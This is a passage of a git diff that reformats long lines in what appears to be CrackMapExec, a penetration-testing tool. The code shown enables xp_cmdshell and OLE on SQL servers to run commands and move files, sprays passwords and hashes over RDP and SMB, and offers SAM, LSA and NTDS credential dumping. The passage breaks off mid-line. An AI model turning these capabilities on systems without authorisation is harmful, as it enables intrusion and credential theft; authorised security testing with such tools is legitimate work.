-313,19 +295,8 @@ class mssql(connection): f"{domain}\\" if not self.args.local_auth else "", username, # Show what was used between cleartext, nthash, aesKey and ccache - " from ccache" - if useCache - else ":%s" - % ( - kerb_pass - if not self.config.get("CME", "audit_mode") - else self.config.get("CME", "audit_mode") * 8 - ), - highlight( - f'({self.config.get("CME", "pwn3d_label")})' - if self.admin_privs - else "" - ), + " from ccache" if useCache else ":%s" % (kerb_pass if not self.config.get("CME", "audit_mode") else self.config.get("CME", "audit_mode") * 8), + highlight(f'({self.config.get("CME", "pwn3d_label")})' if self.admin_privs else ""), ) self.logger.success(out) if not self.args.local_auth: @@ -337,9 +308,7 @@ class mssql(connection): "{}\\{}{} {}".format( f"{domain}\\" if not self.args.local_auth else "", username, - " from ccache" - if useCache - else f":{kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8}", + " from ccache" if useCache else f":{kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8}", e, ) ) @@ -356,9 +325,7 @@ class mssql(connection): # this is to prevent a decoding issue in impacket/ntlm.py:617 where it attempts to decode the domain if not domain: domain = "" - res = 
self.conn.login( - None, username, password, domain, None, not self.args.local_auth - ) + res = self.conn.login(None, username, password, domain, None, not self.args.local_auth) if res is not True: self.conn.printReplies() return False @@ -370,19 +337,13 @@ class mssql(connection): self.db.add_credential("plaintext", domain, username, password) if self.admin_privs: - self.db.add_admin_user( - "plaintext", domain, username, password, self.host - ) + self.db.add_admin_user("plaintext", domain, username, password, self.host) out = "{}{}:{} {}".format( f"{domain}\\" if not self.args.local_auth else "", username, process_secret(password), - highlight( - f'({self.config.get("CME", "pwn3d_label")})' - if self.admin_privs - else "" - ), + highlight(f'({self.config.get("CME", "pwn3d_label")})' if self.admin_privs else ""), ) self.logger.success(out) if not self.args.local_auth: @@ -438,11 +399,7 @@ class mssql(connection): domain, username, process_secret(ntlm_hash), - highlight( - f'({self.config.get("CME", "pwn3d_label")})' - if self.admin_privs - else "" - ), + highlight(f'({self.config.get("CME", "pwn3d_label")})' if self.admin_privs else ""), ) self.logger.success(out) if not self.args.local_auth: @@ -506,9 +463,7 @@ class mssql(connection): get_output = True # We're disabling PS obfuscation by default as it breaks the MSSQLEXEC execution method - ps_command = create_ps_command( - payload, force_ps32=force_ps32, dont_obfs=dont_obfs - ) + ps_command = create_ps_command(payload, force_ps32=force_ps32, dont_obfs=dont_obfs) return self.execute(ps_command, get_output) @requires_admin @@ -523,9 +478,7 @@ class mssql(connection): if exec_method.file_exists(self.args.put_file[1]): self.logger.success("File has been uploaded on the remote machine") else: - self.logger.fail( - "File does not exist on the remote system... error during upload" - ) + self.logger.fail("File does not exist on the remote system... 
error during upload") except Exception as e: self.logger.fail(f"Error during upload : {e}") @@ -535,9 +488,7 @@ class mssql(connection): try: exec_method = MSSQLEXEC(self.conn) exec_method.get_file(self.args.get_file[0], self.args.get_file[1]) - self.logger.success( - f"File {self.args.get_file[0]} was transferred to {self.args.get_file[1]}" - ) + self.logger.success(f"File {self.args.get_file[0]} was transferred to {self.args.get_file[1]}") except Exception as e: self.logger.fail(f"Error reading file {self.args.get_file[0]}: {e}") @@ -548,20 +499,14 @@ class mssql(connection): for i, key in enumerate(self.replies[keys]): if key["TokenType"] == TDS_ERROR_TOKEN: error = f"ERROR({key['ServerName'].decode('utf-16le')}): Line {key['LineNumber']:d}: {key['MsgText'].decode('utf-16le')}" - self.lastError = SQLErrorException( - f"ERROR: Line {key['LineNumber']:d}: {key['MsgText'].decode('utf-16le')}" - ) + self.lastError = SQLErrorException(f"ERROR: Line {key['LineNumber']:d}: {key['MsgText'].decode('utf-16le')}") self._MSSQL__rowsPrinter.error(error) elif key["TokenType"] == TDS_INFO_TOKEN: - self._MSSQL__rowsPrinter.info( - f"INFO({key['ServerName'].decode('utf-16le')}): Line {key['LineNumber']:d}: {key['MsgText'].decode('utf-16le')}" - ) + self._MSSQL__rowsPrinter.info(f"INFO({key['ServerName'].decode('utf-16le')}): Line {key['LineNumber']:d}: {key['MsgText'].decode('utf-16le')}") elif key["TokenType"] == TDS_LOGINACK_TOKEN: - self._MSSQL__rowsPrinter.info( - f"ACK: Result: {key['Interface']} - {key['ProgName'].decode('utf-16le')} ({key['MajorVer']:d}{key['MinorVer']:d} {key['BuildNumHi']:d}{key['BuildNumLow']:d}) " - ) + self._MSSQL__rowsPrinter.info(f"ACK: Result: {key['Interface']} - {key['ProgName'].decode('utf-16le')} ({key['MajorVer']:d}{key['MinorVer']:d} {key['BuildNumHi']:d}{key['BuildNumLow']:d}) ") elif key["TokenType"] == TDS_ENVCHANGE_TOKEN: if key["Type"] in ( @@ -585,8 +530,6 @@ class mssql(connection): _type = "PACKETSIZE" else: _type = f"{key['Type']:d}" - self._MSSQL__rowsPrinter.info( - f"ENVCHANGE({_type}): Old Value: {record['OldValue'].decode('utf-16le')}, New Value: {record['NewValue'].decode('utf-16le')}" - ) + self._MSSQL__rowsPrinter.info(f"ENVCHANGE({_type}): Old Value: {record['OldValue'].decode('utf-16le')}, New Value: {record['NewValue'].decode('utf-16le')}") tds.MSSQL.printReplies = printRepliesCME diff --git a/cme/protocols/mssql/database.py b/cme/protocols/mssql/database.py index bb28f493..ff8a6532 100755 --- a/cme/protocols/mssql/database.py +++ b/cme/protocols/mssql/database.py @@ -70,22 +70,11 @@ class database: def reflect_tables(self): with self.db_engine.connect() as conn: try: - self.HostsTable = Table( - "hosts", self.metadata, autoload_with=self.db_engine - ) - self.UsersTable = Table( - "users", self.metadata, autoload_with=self.db_engine - ) - self.AdminRelationsTable = Table( - "admin_relations", self.metadata, autoload_with=self.db_engine - ) + self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) + self.UsersTable = Table("users", self.metadata, autoload_with=self.db_engine) + self.AdminRelationsTable = Table("admin_relations", self.metadata, autoload_with=self.db_engine) except (NoInspectionAvailable, NoSuchTableError): - print( - "[-] Error reflecting tables - this means there is a DB schema mismatch \n" - "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" - "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" - "[-] 
Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema" - ) + print("[-] Error reflecting tables - this means there is a DB schema mismatch \n" "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema") exit() def shutdown_db(self): @@ -148,9 +137,7 @@ class database: # TODO: find a way to abstract this away to a single Upsert call q = Insert(self.HostsTable) update_columns = {col.name: col for col in q.excluded if col.name not in "id"} - q = q.on_conflict_do_update( - index_elements=self.HostsTable.primary_key, set_=update_columns - ) + q = q.on_conflict_do_update(index_elements=self.HostsTable.primary_key, set_=update_columns) self.conn.execute(q, hosts) def add_credential(self, credtype, domain, username, password, pillaged_from=None): @@ -187,23 +174,17 @@ class database: "credtype": credtype, "pillaged_from_hostid": pillaged_from, } - q = insert(self.UsersTable).values( - user_data - ) # .returning(self.UsersTable.c.id) + q = insert(self.UsersTable).values(user_data) # .returning(self.UsersTable.c.id) self.conn.execute(q) # .first() else: for user in results: # might be able to just remove this if check, but leaving it in for now if not user[3] and not user[4] and not user[5]: - q = update(self.UsersTable).values( - credential_data - ) # .returning(self.UsersTable.c.id) + q = update(self.UsersTable).values(credential_data) # .returning(self.UsersTable.c.id) results = self.conn.execute(q) # .first() # user_rowid = results.id - cme_logger.debug( - f"add_credential(credtype={credtype}, domain={domain}, username={username}, password={password}, pillaged_from={pillaged_from})" - ) + cme_logger.debug(f"add_credential(credtype={credtype}, domain={domain}, username={username}, password={password}, pillaged_from={pillaged_from})") return user_rowid def remove_credentials(self, creds_id): @@ -254,13 +235,9 @@ class database: def get_admin_relations(self, user_id=None, host_id=None): if user_id: - q = select(self.AdminRelationsTable).filter( - self.AdminRelationsTable.c.userid == user_id - ) + q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.userid == user_id) elif host_id: - q = select(self.AdminRelationsTable).filter( - self.AdminRelationsTable.c.hostid == host_id - ) + q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.hostid == host_id) else: q = select(self.AdminRelationsTable) @@ -300,9 +277,7 @@ class database: # if we're filtering by username elif filter_term and filter_term != "": like_term = func.lower(f"%{filter_term}%") - q = select(self.UsersTable).filter( - func.lower(self.UsersTable.c.username).like(like_term) - ) + q = select(self.UsersTable).filter(func.lower(self.UsersTable.c.username).like(like_term)) # otherwise return all credentials else: q = select(self.UsersTable) @@ -338,10 +313,7 @@ class database: # if we're filtering by ip/hostname elif filter_term and filter_term != "": like_term = func.lower(f"%{filter_term}%") - q = select(self.HostsTable).filter( - self.HostsTable.c.ip.like(like_term) - | func.lower(self.HostsTable.c.hostname).like(like_term) - ) + q = select(self.HostsTable).filter(self.HostsTable.c.ip.like(like_term) | func.lower(self.HostsTable.c.hostname).like(like_term)) results = 
self.conn.execute(q).all() return results diff --git a/cme/protocols/mssql/db_navigator.py b/cme/protocols/mssql/db_navigator.py index ae7bd361..9415aeb9 100644 --- a/cme/protocols/mssql/db_navigator.py +++ b/cme/protocols/mssql/db_navigator.py @@ -130,12 +130,7 @@ class navigator(DatabaseNavigator): print_table(data, title="Admin Access to Host(s)") def do_clear_database(self, line): - if ( - input( - "This will destroy all data in the current database, are you SURE you want to run this? (y/n): " - ) - == "y" - ): + if input("This will destroy all data in the current database, are you SURE you want to run this? (y/n): ") == "y": self.db.clear_database() @staticmethod diff --git a/cme/protocols/mssql/mssqlexec.py b/cme/protocols/mssql/mssqlexec.py index 23296204..fc4dfa2f 100755 --- a/cme/protocols/mssql/mssqlexec.py +++ b/cme/protocols/mssql/mssqlexec.py @@ -24,9 +24,7 @@ class MSSQLEXEC: continue command_output.append(row["output"]) except Exception as e: - cme_logger.error( - f"Error when attempting to execute command via xp_cmdshell: {e}" - ) + cme_logger.error(f"Error when attempting to execute command via xp_cmdshell: {e}") if output: cme_logger.debug(f"Output is enabled") @@ -41,64 +39,41 @@ class MSSQLEXEC: try: self.disable_xp_cmdshell() except Exception as e: - cme_logger.error( - f"[OPSEC] Error when attempting to disable xp_cmdshell: {e}" - ) + cme_logger.error(f"[OPSEC] Error when attempting to disable xp_cmdshell: {e}") return command_output # return self.outputBuffer def enable_xp_cmdshell(self): - self.mssql_conn.sql_query( - "exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;" - ) + self.mssql_conn.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;") def disable_xp_cmdshell(self): - self.mssql_conn.sql_query( - "exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure 'show advanced options', 0 ;RECONFIGURE;" - ) + self.mssql_conn.sql_query("exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure 'show advanced options', 0 ;RECONFIGURE;") def enable_ole(self): - self.mssql_conn.sql_query( - "exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'Ole Automation Procedures', 1;RECONFIGURE;" - ) + self.mssql_conn.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'Ole Automation Procedures', 1;RECONFIGURE;") def disable_ole(self): - self.mssql_conn.sql_query( - "exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'Ole Automation Procedures', 0;RECONFIGURE;" - ) + self.mssql_conn.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'Ole Automation Procedures', 0;RECONFIGURE;") def put_file(self, data, remote): try: self.enable_ole() hexdata = data.hex() - self.mssql_conn.sql_query( - "DECLARE @ob INT;" - "EXEC sp_OACreate 'ADODB.Stream', @ob OUTPUT;" - "EXEC sp_OASetProperty @ob, 'Type', 1;" - "EXEC sp_OAMethod @ob, 'Open';" - "EXEC sp_OAMethod @ob, 'Write', NULL, 0x{};" - "EXEC sp_OAMethod @ob, 'SaveToFile', NULL, '{}', 2;" - "EXEC sp_OAMethod @ob, 'Close';" - "EXEC sp_OADestroy @ob;".format(hexdata, remote) - ) + self.mssql_conn.sql_query("DECLARE @ob INT;" "EXEC sp_OACreate 'ADODB.Stream', @ob OUTPUT;" "EXEC sp_OASetProperty @ob, 'Type', 1;" "EXEC sp_OAMethod @ob, 'Open';" "EXEC sp_OAMethod @ob, 'Write', 
NULL, 0x{};" "EXEC sp_OAMethod @ob, 'SaveToFile', NULL, '{}', 2;" "EXEC sp_OAMethod @ob, 'Close';" "EXEC sp_OADestroy @ob;".format(hexdata, remote)) self.disable_ole() except Exception as e: cme_logger.debug(f"Error uploading via mssqlexec: {e}") def file_exists(self, remote): try: - res = self.mssql_conn.batch( - f"DECLARE @r INT; EXEC master.dbo.xp_fileexist '{remote}', @r OUTPUT; SELECT @r as n" - )[0]["n"] + res = self.mssql_conn.batch(f"DECLARE @r INT; EXEC master.dbo.xp_fileexist '{remote}', @r OUTPUT; SELECT @r as n")[0]["n"] return res == 1 except: return False def get_file(self, remote, local): try: - self.mssql_conn.sql_query( - f"SELECT * FROM OPENROWSET(BULK N'{remote}', SINGLE_BLOB) rs" - ) + self.mssql_conn.sql_query(f"SELECT * FROM OPENROWSET(BULK N'{remote}', SINGLE_BLOB) rs") data = self.mssql_conn.rows[0]["BulkColumn"] with open(local, "wb+") as f: diff --git a/cme/protocols/rdp.py b/cme/protocols/rdp.py index d2426af9..194a8543 100644 --- a/cme/protocols/rdp.py +++ b/cme/protocols/rdp.py @@ -80,9 +80,7 @@ class rdp(connection): @staticmethod def proto_args(parser, std_parser, module_parser): - rdp_parser = parser.add_parser( - "rdp", help="own stuff using RDP", parents=[std_parser, module_parser] - ) + rdp_parser = parser.add_parser("rdp", help="own stuff using RDP", parents=[std_parser, module_parser]) rdp_parser.add_argument( "-H", "--hash", @@ -95,19 +93,14 @@ class rdp(connection): rdp_parser.add_argument( "--no-bruteforce", action="store_true", - help=( - "No spray when using file for username and password (user1 =>" - " password1, user2 => password2" - ), + help=("No spray when using file for username and password (user1 =>" " password1, user2 => password2"), ) rdp_parser.add_argument( "--continue-on-success", action="store_true", help="continues authentication attempts even after successes", ) - rdp_parser.add_argument( - "--port", type=int, default=3389, help="Custom RDP port" - ) + rdp_parser.add_argument("--port", type=int, default=3389, help="Custom RDP port") rdp_parser.add_argument( "--rdp-timeout", type=int, @@ -135,17 +128,13 @@ class rdp(connection): help="authenticate locally to each target", ) - egroup = rdp_parser.add_argument_group( - "Screenshot", "Remote Desktop Screenshot" - ) + egroup = rdp_parser.add_argument_group("Screenshot", "Remote Desktop Screenshot") egroup.add_argument( "--screenshot", action="store_true", help="Screenshot RDP if connection success", ) - egroup.add_argument( - "--screentime", type=int, default=10, help="Time to wait for desktop image" - ) + egroup.add_argument("--screentime", type=int, default=10, help="Time to wait for desktop image") egroup.add_argument( "--res", default="1024x768", @@ -176,24 +165,14 @@ class rdp(connection): def print_host_info(self): if self.domain is None: - self.logger.display( - "Probably old, doesn't not support HYBRID or HYBRID_EX" - f" (nla:{self.nla})" - ) + self.logger.display("Probably old, doesn't not support HYBRID or HYBRID_EX" f" (nla:{self.nla})") else: - self.logger.display( - f"{self.server_os} (name:{self.hostname}) (domain:{self.domain})" - f" (nla:{self.nla})" - ) + self.logger.display(f"{self.server_os} (name:{self.hostname}) (domain:{self.domain})" f" (nla:{self.nla})") return True def create_conn_obj(self): - self.target = RDPTarget( - ip=self.host, domain="FAKE", timeout=self.args.rdp_timeout - ) - self.auth = NTLMCredential( - secret="pass", username="user", domain="FAKE", stype=asyauthSecret.PASS - ) + self.target = RDPTarget(ip=self.host, domain="FAKE", 
timeout=self.args.rdp_timeout) + self.auth = NTLMCredential(secret="pass", username="user", domain="FAKE", stype=asyauthSecret.PASS) self.check_nla() @@ -216,15 +195,9 @@ class rdp(connection): info_domain = self.conn.get_extra_info() self.domain = info_domain["dnsdomainname"] self.hostname = info_domain["computername"] - self.server_os = ( - info_domain["os_guess"] - + " Build " - + str(info_domain["os_build"]) - ) + self.server_os = info_domain["os_guess"] + " Build " + str(info_domain["os_build"]) - self.output_filename = os.path.expanduser( - f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}" - ) + self.output_filename = os.path.expanduser(f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}") self.output_filename = self.output_filename.replace(":", "-") break @@ -254,11 +227,7 @@ class rdp(connection): credentials=self.auth, ) asyncio.run(self.connect_rdp()) - if ( - str(proto) == "SUPP_PROTOCOLS.RDP" - or str(proto) == "SUPP_PROTOCOLS.SSL" - or str(proto) == "SUPP_PROTOCOLS.SSL|SUPP_PROTOCOLS.RDP" - ): + if str(proto) == "SUPP_PROTOCOLS.RDP" or str(proto) == "SUPP_PROTOCOLS.SSL" or str(proto) == "SUPP_PROTOCOLS.SSL|SUPP_PROTOCOLS.RDP": self.nla = False return except Exception as e: @@ -307,15 +276,11 @@ class rdp(connection): if not password: password = getenv("KRB5CCNAME") if not password else password if "/" in password: - self.logger.fail( - "Kerberos ticket need to be on the local directory" - ) + self.logger.fail("Kerberos ticket need to be on the local directory") return False ccache = CCache.loadFile(getenv("KRB5CCNAME")) ticketCreds = ccache.credentials[0] - username = ( - ticketCreds["client"].prettyPrint().decode().split("@")[0] - ) + username = ticketCreds["client"].prettyPrint().decode().split("@")[0] else: stype = asyauthSecret.PASS if not nthash else asyauthSecret.NT @@ -334,9 +299,7 @@ class rdp(connection): domain=domain, stype=stype, ) - self.conn = RDPConnection( - iosettings=self.iosettings, target=self.target, credentials=self.auth - ) + self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth) asyncio.run(self.connect_rdp()) self.admin_privs = True @@ -348,12 +311,7 @@ class rdp(connection): # Show what was used between cleartext, nthash, aesKey and ccache " from ccache" if useCache - else ":%s" - % ( - kerb_pass - if not self.config.get("CME", "audit_mode") - else self.config.get("CME", "audit_mode") * 8 - ) + else ":%s" % (kerb_pass if not self.config.get("CME", "audit_mode") else self.config.get("CME", "audit_mode") * 8) ), self.mark_pwned(), ) @@ -370,22 +328,11 @@ class rdp(connection): if word in str(e): reason = self.rdp_error_status[word] self.logger.fail( - ( - f"{domain}\\{username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8)} {f'({reason})' if reason else str(e)}" - ), - color=( - "magenta" - if ( - (reason or "CredSSP" in str(e)) - and reason != "KDC_ERR_C_PRINCIPAL_UNKNOWN" - ) - else "red" - ), + (f"{domain}\\{username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8)} {f'({reason})' if reason else str(e)}"), + color=("magenta" if ((reason or "CredSSP" in str(e)) and reason != "KDC_ERR_C_PRINCIPAL_UNKNOWN") else "red"), ) elif "Authentication failed!" 
in str(e): - self.logger.success( - f"{domain}\\{username}:{password} {self.mark_pwned()}" - ) + self.logger.success(f"{domain}\\{username}:{password} {self.mark_pwned()}") elif "No such file" in str(e): self.logger.fail(e) else: @@ -396,17 +343,8 @@ class rdp(connection): if "cannot unpack non-iterable NoneType object" == str(e): reason = "User valid but cannot connect" self.logger.fail( - ( - f"{domain}\\{username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8)} {f'({reason})' if reason else ''}" - ), - color=( - "magenta" - if ( - (reason or "CredSSP" in str(e)) - and reason != "STATUS_LOGON_FAILURE" - ) - else "red" - ), + (f"{domain}\\{username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8)} {f'({reason})' if reason else ''}"), + color=("magenta" if ((reason or "CredSSP" in str(e)) and reason != "STATUS_LOGON_FAILURE") else "red"), ) return False @@ -418,9 +356,7 @@ class rdp(connection): domain=domain, stype=asyauthSecret.PASS, ) - self.conn = RDPConnection( - iosettings=self.iosettings, target=self.target, credentials=self.auth - ) + self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth) asyncio.run(self.connect_rdp()) self.admin_privs = True @@ -431,9 +367,7 @@ class rdp(connection): return True except Exception as e: if "Authentication failed!" in str(e): - self.logger.success( - f"{domain}\\{username}:{password} {self.mark_pwned()}" - ) + self.logger.success(f"{domain}\\{username}:{password} {self.mark_pwned()}") else: reason = None for word in self.rdp_error_status.keys(): @@ -442,17 +376,8 @@ class rdp(connection): if "cannot unpack non-iterable NoneType object" == str(e): reason = "User valid but cannot connect" self.logger.fail( - ( - f"{domain}\\{username}:{password} {f'({reason})' if reason else ''}" - ), - color=( - "magenta" - if ( - (reason or "CredSSP" in str(e)) - and reason != "STATUS_LOGON_FAILURE" - ) - else "red" - ), + (f"{domain}\\{username}:{password} {f'({reason})' if reason else ''}"), + color=("magenta" if ((reason or "CredSSP" in str(e)) and reason != "STATUS_LOGON_FAILURE") else "red"), ) return False @@ -464,24 +389,18 @@ class rdp(connection): domain=domain, stype=asyauthSecret.NT, ) - self.conn = RDPConnection( - iosettings=self.iosettings, target=self.target, credentials=self.auth - ) + self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth) asyncio.run(self.connect_rdp()) self.admin_privs = True - self.logger.success( - f"{self.domain}\\{username}:{ntlm_hash} {self.mark_pwned()}" - ) + self.logger.success(f"{self.domain}\\{username}:{ntlm_hash} {self.mark_pwned()}") if not self.args.local_auth: add_user_bh(username, domain, self.logger, self.config) if not self.args.continue_on_success: return True except Exception as e: if "Authentication failed!" 
in str(e): - self.logger.success( - f"{domain}\\{username}:{ntlm_hash} {self.mark_pwned()}" - ) + self.logger.success(f"{domain}\\{username}:{ntlm_hash} {self.mark_pwned()}") else: reason = None for word in self.rdp_error_status.keys(): @@ -491,25 +410,14 @@ class rdp(connection): reason = "User valid but cannot connect" self.logger.fail( - ( - f"{domain}\\{username}:{ntlm_hash} {f'({reason})' if reason else ''}" - ), - color=( - "magenta" - if ( - (reason or "CredSSP" in str(e)) - and reason != "STATUS_LOGON_FAILURE" - ) - else "red" - ), + (f"{domain}\\{username}:{ntlm_hash} {f'({reason})' if reason else ''}"), + color=("magenta" if ((reason or "CredSSP" in str(e)) and reason != "STATUS_LOGON_FAILURE") else "red"), ) return False async def screen(self): try: - self.conn = RDPConnection( - iosettings=self.iosettings, target=self.target, credentials=self.auth - ) + self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth) await self.connect_rdp() except Exception as e: return @@ -517,9 +425,7 @@ class rdp(connection): await asyncio.sleep(int(5)) if self.conn is not None and self.conn.desktop_buffer_has_data is True: buffer = self.conn.get_desktop_buffer(VIDEO_FORMAT.PIL) - filename = os.path.expanduser( - f"~/.cme/screenshots/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.png" - ) + filename = os.path.expanduser(f"~/.cme/screenshots/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.png") buffer.save(filename, "png") self.logger.highlight(f"Screenshot saved {filename}") @@ -529,20 +435,14 @@ class rdp(connection): async def nla_screen(self): # Otherwise it crash self.iosettings.supported_protocols = None - self.auth = NTLMCredential( - secret="", username="", domain="", stype=asyauthSecret.PASS - ) - self.conn = RDPConnection( - iosettings=self.iosettings, target=self.target, credentials=self.auth - ) + self.auth = NTLMCredential(secret="", username="", domain="", stype=asyauthSecret.PASS) + self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth) await self.connect_rdp_old(self.url) await asyncio.sleep(int(self.args.screentime)) if self.conn is not None and self.conn.desktop_buffer_has_data is True: buffer = self.conn.get_desktop_buffer(VIDEO_FORMAT.PIL) - filename = os.path.expanduser( - f"~/.cme/screenshots/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.png" - ) + filename = os.path.expanduser(f"~/.cme/screenshots/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.png") buffer.save(filename, "png") self.logger.highlight(f"NLA Screenshot saved {filename}") diff --git a/cme/protocols/rdp/database.py b/cme/protocols/rdp/database.py index fb144a24..3cc915b0 100644 --- a/cme/protocols/rdp/database.py +++ b/cme/protocols/rdp/database.py @@ -49,19 +49,10 @@ class database: def reflect_tables(self): with self.db_engine.connect() as conn: try: - self.CredentialsTable = Table( - "credentials", self.metadata, autoload_with=self.db_engine - ) - self.HostsTable = Table( - "hosts", self.metadata, autoload_with=self.db_engine - ) + self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine) + self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) except (NoInspectionAvailable, NoSuchTableError): - print( - "[-] Error reflecting tables - this means there is a DB schema mismatch \n" - "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" - "[-] 
If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" - "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema" - ) + print("[-] Error reflecting tables - this means there is a DB schema mismatch \n" "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema") exit() def shutdown_db(self): diff --git a/cme/protocols/rdp/db_navigator.py b/cme/protocols/rdp/db_navigator.py index b1afbf92..36777af1 100644 --- a/cme/protocols/rdp/db_navigator.py +++ b/cme/protocols/rdp/db_navigator.py @@ -6,12 +6,7 @@ from cme.cmedb import DatabaseNavigator, print_help class navigator(DatabaseNavigator): def do_clear_database(self, line): - if ( - input( - "This will destroy all data in the current database, are you SURE you want to run this? (y/n): " - ) - == "y" - ): + if input("This will destroy all data in the current database, are you SURE you want to run this? (y/n): ") == "y": self.db.clear_database() def help_clear_database(self): diff --git a/cme/protocols/smb.py b/cme/protocols/smb.py index af268b65..bf955420 100755 --- a/cme/protocols/smb.py +++ b/cme/protocols/smb.py @@ -163,14 +163,13 @@ class smb(connection): self.pvkbytes = None self.no_da = None self.no_ntlm = False + self.protocol = "SMB" connection.__init__(self, args, db, host) @staticmethod def proto_args(parser, std_parser, module_parser): - smb_parser = parser.add_parser( - "smb", help="own stuff using SMB", parents=[std_parser, module_parser] - ) + smb_parser = parser.add_parser("smb", help="own stuff using SMB", parents=[std_parser, module_parser]) smb_parser.add_argument( "-H", "--hash", @@ -243,16 +242,10 @@ class smb(connection): const="administrator", ) - cgroup = smb_parser.add_argument_group( - "Credential Gathering", "Options for gathering credentials" - ) + cgroup = smb_parser.add_argument_group("Credential Gathering", "Options for gathering credentials") cegroup = cgroup.add_mutually_exclusive_group() - cegroup.add_argument( - "--sam", action="store_true", help="dump SAM hashes from target systems" - ) - cegroup.add_argument( - "--lsa", action="store_true", help="dump LSA secrets from target systems" - ) + cegroup.add_argument("--sam", action="store_true", help="dump SAM hashes from target systems") + cegroup.add_argument("--lsa", action="store_true", help="dump LSA secrets from target systems") cegroup.add_argument( "--ntds", choices={"vss", "drsuapi"}, @@ -270,47 +263,31 @@ class smb(connection): # cgroup.add_argument("--ntds-history", action='store_true', help='Dump NTDS.dit password history') # cgroup.add_argument("--ntds-pwdLastSet", action='store_true', help='Shows the pwdLastSet attribute for each NTDS.dit account') - ngroup = smb_parser.add_argument_group( - "Credential Gathering", "Options for gathering credentials" - ) + ngroup = smb_parser.add_argument_group("Credential Gathering", "Options for gathering credentials") ngroup.add_argument( "--mkfile", action="store", help="DPAPI option. File with masterkeys in form of {GUID}:SHA1", ) - ngroup.add_argument( - "--pvk", action="store", help="DPAPI option. 
File with domain backupkey" - ) - ngroup.add_argument( - "--enabled", action="store_true", help="Only dump enabled targets from DC" - ) - ngroup.add_argument( - "--user", dest="userntds", type=str, help="Dump selected user from DC" - ) + ngroup.add_argument("--pvk", action="store", help="DPAPI option. File with domain backupkey") + ngroup.add_argument("--enabled", action="store_true", help="Only dump enabled targets from DC") + ngroup.add_argument("--user", dest="userntds", type=str, help="Dump selected user from DC") - egroup = smb_parser.add_argument_group( - "Mapping/Enumeration", "Options for Mapping/Enumerating" - ) - egroup.add_argument( - "--shares", action="store_true", help="enumerate shares and access" - ) + egroup = smb_parser.add_argument_group("Mapping/Enumeration", "Options for Mapping/Enumerating") + egroup.add_argument("--shares", action="store_true", help="enumerate shares and access") egroup.add_argument( "--filter-shares", nargs="+", help="Filter share by access, option 'read' 'write' or 'read,write'", ) - egroup.add_argument( - "--sessions", action="store_true", help="enumerate active sessions" - ) + egroup.add_argument("--sessions", action="store_true", help="enumerate active sessions") egroup.add_argument("--disks", action="store_true", help="enumerate disks") egroup.add_argument( "--loggedon-users-filter", action="store", help="only search for specific user, works with regex", ) - egroup.add_argument( - "--loggedon-users", action="store_true", help="enumerate logged on users" - ) + egroup.add_argument("--loggedon-users", action="store_true", help="enumerate logged on users") egroup.add_argument( "--users", nargs="?", @@ -339,9 +316,7 @@ class smb(connection): metavar="GROUP", help="enumerate local groups, if a group is specified then its members are enumerated", ) - egroup.add_argument( - "--pass-pol", action="store_true", 